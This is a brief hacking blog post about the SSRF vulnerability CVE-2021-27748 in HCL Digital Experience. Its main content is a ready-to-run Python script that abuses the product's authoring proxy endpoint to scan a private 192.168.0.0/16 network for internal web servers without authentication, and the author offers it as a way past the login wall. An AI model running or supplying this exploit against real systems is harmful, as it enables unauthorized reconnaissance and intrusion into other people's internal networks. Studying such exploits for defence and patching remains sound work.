Changing the exploit

February 11, 2024

2024   ·   hacking,   exploitation     ·   posts  

CVE-2021-27748

CVE-2021-27748 is identified as a server-side request forgery (SSRF) vulnerability, affecting IBM WebSphere HCL Digital Experience versions 9.5 and 9.0. While SSRF is commonly associated with external server interactions, this vulnerability also presents a significant risk for internal network exploration by unauthorised users.

Traditionally, SSRF attacks are conceptualised as a method to interact with or exploit external systems. However, CVE-2021-27748 showcases a critical pivot in attacker methodology—using SSRF to enumerate and interact with systems within the internal network. This approach can reveal sensitive internal services and metadata about internal infrastructure or even expose internal-only endpoints and APIs. The script below exploits the CVE as usual but unpacks a private subnet to enumerate internal webservers. This puts us in the internal network., after the authentication wall, but without authenticating

import requests
import ipaddress

headers = {"Sec-Ch-Ua": "", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"\"", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest":
       	"document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Sec-Gpc": "1", "Referer": "https://www.example.com/wps/PA_WCM_Authoring_UI/proxy/http/127.0.0.1"}

base_network = ipaddress.ip_network('192.168.0.0/16', strict=False)

for testip in base_network.subnets(new_prefix=24):
	ip = next(testip.hosts())
	url = f"https://www.example:443/wps/PA_WCM_Authoring_UI/proxy/http/{ip}"
	try:
    	response = requests.get(url, headers=headers)
    	print(f"IP: {ip}, Status Code: {response.status_code}")
	except requests.exceptions.RequestException as e:
    	print(f"Error reaching IP: {ip}. Error: {e}")


Enjoy Reading This Article?

Here are some more articles you might like to read next:

  • Blind SQL Injection
  • Large Language Model Penetration Testing
  • Internal Penetration Test Notes
  • Quick Bash Fu to get an overview of a target
  • Is the exploit not working? Keep going; don’t stop